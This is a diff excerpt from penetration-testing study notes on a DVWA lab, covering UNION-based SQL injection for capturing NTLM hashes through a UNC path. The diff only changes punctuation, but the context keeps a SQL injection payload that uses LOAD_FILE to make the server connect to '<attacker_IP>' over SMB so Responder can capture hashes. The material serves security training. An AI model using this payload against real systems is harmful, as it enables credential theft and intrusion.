U53RW4R3/SCPA/SCPA Phases/Tactics && Techniques && Procedures (TTPs) Phases/WebApp Hacking/Injection/SQL Injection/01 - In-Band SQL Injection/Lab Simulation/01 - DVWA/Difficulty/Low/Manual/03 - UNION Query SQL Injection/04 - Initial Foothold and Persistence.md

 ##### 4.2.5.1.4 - NTLM Hashes (Out-of-band) via Authenticated SMB Relay

-TODO: Check the links in the references to check other ways to exploit UNC paths
+TODO: Check the links in the references to check other ways to exploit UNC paths.

-- Run [[Responder|Responder]] to grab the NTLM hashes
+- Run [[Responder|Responder]] to grab the NTLM hashes.

 ```sql
 ' UNION SELECT NULL, LOAD_FILE('\\\\<attacker_IP>\\snare.txt')#